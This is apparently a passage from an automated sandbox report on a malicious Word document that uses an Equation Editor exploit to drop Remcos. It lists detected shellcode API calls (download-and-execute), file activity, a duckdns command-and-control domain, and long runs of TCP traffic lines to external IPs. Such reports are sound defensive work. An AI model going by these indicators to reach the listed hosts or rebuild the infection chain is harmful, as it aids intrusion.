                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CBC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_15CBC291
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032358CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,5_2_032358CC
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_2DE910F1
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE96580 FindFirstFileExA,9_2_2DE96580
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA7C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_15CA7C97
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                        Software Vulnerabilities

                        barindex
                        Document exploit detected (process start blacklist hit)
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Shellcode detected
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035404C0 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035404C0
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035404EE ShellExecuteW,ExitProcess,2_2_035404EE
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540513 ExitProcess,2_2_03540513
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035403DF LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035403DF
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035404D9 ShellExecuteW,ExitProcess,2_2_035404D9
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035403C3 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035403C3
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035403AA ExitProcess,2_2_035403AA
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354046B URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0354046B
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: kenoss.duckdns.org
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 178.237.33.50:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
